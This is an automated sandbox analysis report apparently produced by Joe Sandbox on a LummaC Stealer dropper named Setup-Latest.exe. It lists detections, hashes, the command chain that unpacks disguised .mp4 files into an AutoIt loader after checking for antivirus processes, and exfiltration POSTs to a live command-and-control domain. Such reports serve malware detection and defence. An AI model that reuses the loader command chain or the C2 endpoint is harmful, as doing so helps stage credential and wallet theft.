Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup-Latest.exe

Overview

General Information

Sample name:Setup-Latest.exe
Analysis ID:1615219
MD5:d905d14928e2766285ed7ca83eaaf4b3
SHA1:5d27b2c538c81f7819f7de1071c28ecd03c5bd2e
SHA256:721f6073f9ec13d9a1b7cff7b7cfab342ec6fd5ebc1a95c006ae11198e8abfc9
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • Setup-Latest.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\Setup-Latest.exe" MD5: D905D14928E2766285ED7CA83EAAF4B3)
    • cmd.exe (PID: 7596 cmdline: "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • expand.exe (PID: 7648 cmdline: expand Wide.mp4 Wide.mp4.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
      • tasklist.exe (PID: 7700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7708 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7752 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7792 cmdline: cmd /c md 562639 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7808 cmdline: extrac32 /Y /E Always.mp4 MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7836 cmdline: findstr /V "Yang" Labor MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7852 cmdline: cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7868 cmdline: cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Wages.com (PID: 7884 cmdline: Wages.com G MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7904 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7596, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7752, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-02-14T16:55:55.172476+010020283713Unknown Traffic192.168.2.449737188.114.97.3443TCP
      2025-02-14T16:55:56.196791+010020283713Unknown Traffic192.168.2.449738188.114.97.3443TCP
      2025-02-14T16:55:57.459844+010020283713Unknown Traffic192.168.2.449739188.114.97.3443TCP
      2025-02-14T16:55:59.322762+010020283713Unknown Traffic192.168.2.449740188.114.97.3443TCP
      2025-02-14T16:56:00.447277+010020283713Unknown Traffic192.168.2.449741188.114.97.3443TCP
      2025-02-14T16:56:01.763539+010020283713Unknown Traffic192.168.2.449742188.114.97.3443TCP
      2025-02-14T16:56:03.118342+010020283713Unknown Traffic192.168.2.449743188.114.97.3443TCP
      2025-02-14T16:56:05.414362+010020283713Unknown Traffic192.168.2.449744188.114.97.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-02-14T16:55:55.683804+010020546531A Network Trojan was detected192.168.2.449737188.114.97.3443TCP
      2025-02-14T16:55:56.847472+010020546531A Network Trojan was detected192.168.2.449738188.114.97.3443TCP
      2025-02-14T16:56:05.960131+010020546531A Network Trojan was detected192.168.2.449744188.114.97.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-02-14T16:55:55.683804+010020498361A Network Trojan was detected192.168.2.449737188.114.97.3443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-02-14T16:55:58.812520+010020480941Malware Command and Control Activity Detected192.168.2.449739188.114.97.3443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Setup-Latest.exeVirustotal: Detection: 19%Perma Link
      Source: Setup-Latest.exeReversingLabs: Detection: 18%
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
      Source: Setup-Latest.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: Setup-Latest.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\562639Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\562639\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49737 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.97.3:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O8W7XY041YOVJERDM2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18163Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L1XEQBKUETKEOFX6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8772Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0NOQB56KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WF1N3UL2JOPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2617Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=64YFSWT7I6O5LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 558936Host: zengardxen.cyou
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: zengardxen.cyou
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ
      Source: global trafficDNS traffic detected: DNS query: zengardxen.cyou
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: zengardxen.cyou
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: Setup-Latest.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Wages.com, 0000000D.00000000.1763368679.0000000000985000.00000002.00000001.01000000.00000007.sdmp, Decorating.9.dr, Wages.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Volunteers.9.dr, Wages.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Wages.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile created: C:\Windows\CompletionMortgagesJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile created: C:\Windows\OlympicsGreekJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile created: C:\Windows\PavilionDressedJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile created: C:\Windows\SpaMeetingsJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\562639\Wages.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: String function: 004062CF appears 58 times
      Source: Setup-Latest.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/23@2/1
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Setup-Latest.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile created: C:\Users\user\AppData\Local\Temp\nsdD8A1.tmpJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
      Source: Setup-Latest.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Setup-Latest.exeVirustotal: Detection: 19%
      Source: Setup-Latest.exeReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\Setup-Latest.exeFile read: C:\Users\user\Desktop\Setup-Latest.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Setup-Latest.exe "C:\Users\user\Desktop\Setup-Latest.exe"
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Wide.mp4 Wide.mp4.bat
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 562639
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Always.mp4
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Yang" Labor
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 G
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\562639\Wages.com Wages.com G
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\Setup-Latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Wide.mp4 Wide.mp4.bat & Wide.mp4.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\expand.exe expand Wide.mp4 Wide.mp4.batJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 562639Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Always.mp4Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Yang" Labor Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 562639\Wages.com + Uniform + Textbooks + Exhibits + Accountability + Fails + Pavilion + Suggestions + Decorating + Volunteers 562639\Wages.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Strikes.mp4 + ..\Darkness.mp4 + ..\Oaks.mp4 + ..\Fares.mp4 + ..\Funding.mp4 + ..\Complimentary.mp4 + ..\Relate.mp4 GJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\562639\Wages.com Wages.com GJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Setup-Latest.exeSection loaded: coremessaging.dllJump to behavior
